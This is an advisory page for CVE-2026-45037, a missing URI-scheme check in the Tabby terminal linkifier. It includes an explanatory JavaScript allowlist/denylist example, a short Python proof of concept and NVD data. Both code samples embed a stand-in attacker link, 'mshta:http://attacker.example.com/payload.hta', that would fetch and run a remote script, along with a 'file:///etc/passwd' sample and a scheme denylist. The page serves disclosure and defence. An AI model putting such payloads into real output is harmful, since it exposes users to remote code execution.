Security Vulnerability Report
CVE-2026-45037 CVSS 7.1 HIGH

CVE-2026-45037

Published: 2026-05-15 17:16:49
Last Modified: 2026-05-15 17:16:49

Description

Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.232, Tabby's terminal linkifier passes any detected URI directly to the operating system's protocol handler without validating the protocol scheme. This allows a malicious SSH or Telnet server to send crafted terminal output containing dangerous protocol URIs which Tabby renders as clickable links, triggering arbitrary OS protocol handlers on the victim's machine. This vulnerability is fixed in 1.0.232.
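The scheme check the description says was missing, shown as an added example written for this page: it is not Tabby's code and does not reproduce the project's actual fix. A minimal linkifier pulls URIs out of terminal output and decides which of them may be handed to the operating system. The regex, the allowlist and the sample output are assumptions; the `mshta:` scheme in the sample is the one used by the PoC further down and is only there as attacker-controlled input. A denylist variant is included because the NVD record tags CWE-184 (incomplete list of disallowed inputs): a list of forbidden schemes cannot keep up with whatever protocol handlers happen to be registered on the victim's machine, whereas an allowlist of the few schemes a terminal actually needs to open does not have that problem.

```javascript
// Added example, not Tabby's code. Hypothetical linkifier that extracts URIs
// from terminal output and filters them before they could reach the OS
// protocol handler (e.g. Electron's shell.openExternal in a real app).

// Generic URI matcher: scheme per RFC 3986, optional "//", then a run of
// non-whitespace characters. Deliberately loose, like a terminal linkifier.
const URI_RE = /\b([a-z][a-z0-9+.-]*):(?:\/\/)?[^\s<>"'`]+/gi;

// Assumed policy: the only schemes a terminal has a reason to open externally.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Assumed denylist, the CWE-184 anti-pattern: whatever is listed here, some
// other registered handler on the victim's OS will not be.
const DENIED_SCHEMES = new Set(['javascript', 'file', 'vbscript']);

// Returns every URI in the text together with its lower-cased scheme.
function extractUris(text) {
  return Array.from(text.matchAll(URI_RE), (m) => ({
    uri: m[0],
    scheme: m[1].toLowerCase(),
  }));
}

// Vulnerable behaviour described in the advisory: every detected URI
// becomes a clickable link and is passed straight to the OS.
function linkifyUnchecked(text) {
  return extractUris(text).map((l) => l.uri);
}

// Incomplete fix: block a few known-bad schemes, pass everything else.
function linkifyDenylist(text) {
  return extractUris(text)
    .filter((l) => !DENIED_SCHEMES.has(l.scheme))
    .map((l) => l.uri);
}

// Allowlist fix: only schemes the terminal explicitly supports become links.
function linkifyAllowlist(text) {
  return extractUris(text)
    .filter((l) => ALLOWED_SCHEMES.has(l.scheme))
    .map((l) => l.uri);
}

// Constructed sample of output a malicious SSH/Telnet server could send.
// Mixed-case MAILTO checks that scheme comparison is case-insensitive.
const SAMPLE_OUTPUT = [
  'Welcome to build-host-01',
  'Docs: https://example.com/runbook',
  'Contact: MAILTO:ops@example.com',
  'Verify your session: mshta:http://attacker.example/p.hta',
  'Or open file:///etc/passwd',
].join('\n');

console.log('unchecked:', linkifyUnchecked(SAMPLE_OUTPUT));
console.log('denylist: ', linkifyDenylist(SAMPLE_OUTPUT));
console.log('allowlist:', linkifyAllowlist(SAMPLE_OUTPUT));
```

On the constructed sample the unchecked linkifier hands all four URIs to the OS, the denylist stops `file:` but lets the unlisted `mshta:` through, and the allowlist keeps only the `https:` and `mailto:` links. Scheme matching is done on the lower-cased scheme, since protocol handlers are looked up case-insensitively and a check that only knows `mailto` would otherwise be bypassed by `MAILTO`.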

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available yet (the NVD record is still in "Received" status). Affected range taken from the advisory text:

Tabby < 1.0.232

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Simulation for CVE-2026-45037
# This script simulates a malicious SSH server sending a crafted payload.
# It demonstrates the payload generation, not the actual server implementation.

def generate_malicious_output():
    # The malicious URI designed to trigger the OS protocol handler
    # Example: Using mshta to execute a remote script (common technique)
    malicious_uri = "mshta:http://attacker.example.com/payload.hta"

    # Simulated terminal output that might appear in a real SSH session
    banner = "Welcome to the Secure Shell Server."
    trick_message = "Click here to verify your session: " + malicious_uri
    return banner + "\n" + trick_message


if __name__ == "__main__":
    print("[*] Generating malicious terminal output for CVE-2026-45037...")
    print(generate_malicious_output())

References

https://github.com/Eugeny/tabby/security/advisories/GHSA-cmpc-v2x9-j9x9 (GitHub Security Advisory; the only reference listed in the raw NVD record below, which also tags the weaknesses CWE-184 and CWE-601)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45037", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:48.623", "lastModified": "2026-05-15T17:16:48.623", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.232, Tabby's terminal linkifier passes any detected URI directly to the operating system's protocol handler without validating the protocol scheme. This allows a malicious SSH or Telnet server to send crafted terminal output containing dangerous protocol URIs which Tabby renders as clickable links, triggering arbitrary OS protocol handlers on the victim's machine. This vulnerability is fixed in 1.0.232."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/Eugeny/tabby/security/advisories/GHSA-cmpc-v2x9-j9x9", "source": "[email protected]"}]}}